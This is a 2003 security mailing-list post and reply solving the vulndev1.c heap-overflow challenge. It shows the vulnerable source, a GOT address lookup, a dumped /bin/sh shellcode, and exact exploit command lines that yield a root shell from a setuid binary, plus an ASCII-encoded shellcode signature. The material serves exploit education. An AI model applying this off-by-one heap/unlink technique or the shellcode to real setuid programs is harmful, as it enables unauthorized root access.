Vulnerability Development mailing list archives
RE: vulndev1.c solution (warning SPOILER)
From: "Cameron Brown" <cameron () greyzone com>
Date: Wed, 14 May 2003 02:43:29 -0700
This *almost* worked for me, but not quite. After figuring out the correct addresses to substitute, I was still getting segfaults. After some playing I tried the following, which worked for me: ./vuln1 `printf "\xeb\x0c"``perl -e 'print "A"x204;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` Adding the "\xeb\x0c" jumps over the damage done by free() at p1+8. I'm not sure I understand yet how it could have worked for you without the jump. My free() damage was a call into bad memory, maybe yours was somehow something less disruptive? Thanks very much Jose for posting this spoiler, and thanks Dave McKinney and Aaron Adams for posing this challenge to the list. As a newcomer I have learned more in one day today about exploits than I have in the past 2 months of watching this list. Cameron -----Original Message----- From: Jose Ronnick [mailto:matrix () phiral com] Sent: Tuesday, May 13, 2003 6:23 PM To: vuln-dev () securityfocus com Subject: Re: vulndev1.c solution (warning SPOILER) Man.. someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further.. matrix@overdose vuln-dev $ cat vulndev1.c // vulndev-1.c // vuln-dev mailing list security challenge #1 // by Aaron Adams <aadams () securityfocus com> // Spot the error in this program. #include <stdio.h> #include <stdlib.h> #define SIZE 252 int main(int argc, char *argv[]) { int i; char *p1, *p2; char *buf1 = malloc(SIZE); char *buf2 = malloc(SIZE); if (argc != 3) exit(1); p1 = argv[1], p2 = argv[2]; printf("p1 is at %p\n", p1); // DEBUG strncpy(buf2, p2, SIZE); for (i = 0; i <= SIZE && p1[i] != '\0'; i++) buf1[i] = p1[i]; free(buf1); free(buf2); return 0; } matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c matrix@overdose vuln-dev $ sudo chown root.root ./vuln1 matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1 matrix@overdose vuln-dev $ objdump -R ./vuln1 ./vuln1: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049654 R_386_GLOB_DAT __gmon_start__ 0804963c R_386_JUMP_SLOT malloc 08049640 R_386_JUMP_SLOT __libc_start_main 08049644 R_386_JUMP_SLOT printf 08049648 R_386_JUMP_SLOT exit 0804964c R_386_JUMP_SLOT free 08049650 R_386_JUMP_SLOT strncpy matrix@overdose vuln-dev $ pcalc 0x4c-12 64 0x40 0y1000000 matrix@overdose vuln-dev $ od -ch shell 0000000 1 300 260 F 1 333 1 311 315 200 353 026 [ 1 300 210 c031 46b0 db31 c931 80cd 16eb 315b 88c0 0000020 C \a 211 [ \b 211 C \f 260 \v 215 K \b 215 S \f 0743 5b89 8908 0c43 0bb0 4b8d 8d08 0c53 0000040 315 200 350 345 377 377 377 / b i n / s h 80cd e5e8 ffff 2fff 6962 2f6e 6873 0000056 matrix@overdose vuln-dev $ wc -c shell 46 shell matrix@overdose vuln-dev $ pcalc 252-46 206 0xce 0y11001110 matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"` p1 is at 0xbffff839 Segmentation fault matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"` p1 is at 0xbffff839 sh-2.05b# id uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio) sh-2.05b# questions? comments? >=) -- %JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXq v-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-<C19-~mvIP-PqcJ- yaa7P-c0oe-rAypP-I$*F-q)cjP-*22a-WPjDP-5134-tPUn-w4wxP-118B-WV4w-xx4vPPP PPPPPPPPPPPPPPPPPPP
Current thread:
- Re: partial analysis of vulndev-1.c, (continued)
- Re: partial analysis of vulndev-1.c master of chaos - lord of mean (May 13)
- RE: partial analysis of vulndev-1.c David Schwartz (May 13)
- Re: partial analysis of vulndev-1.c Nexus (May 14)
- Re: partial analysis of vulndev-1.c andrewg (May 13)
- Re: partial analysis of vulndev-1.c master of chaos - lord of mean (May 13)
- Re: Administrivia: List Announcement Mr. Rufus Faloofus (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Cameron Brown (May 13)
- RE: Administrivia: List Announcement andrewg (May 13)
- RE: Administrivia: List Announcement Shafik Yaghmour (May 13)
- Re: vulndev1.c solution (warning SPOILER) Jose Ronnick (May 13)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 14)
- Re: vulndev1.c solution (warning SPOILER) Jon Erickson (May 14)
- RE: vulndev1.c solution (warning SPOILER) Cameron Brown (May 15)
- Re: vulndev1.c solution (warning SPOILER) Kenji Cronos (May 15)
- Re: vulndev-1 exploit. Joel Eriksson (May 14)
- Re: Administrivia: List Announcement Shafik Yaghmour (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)
- RE: Administrivia: List Announcement Gustavo Scotti (May 13)
- RE: Administrivia: List Announcement Oliver Lavery (May 13)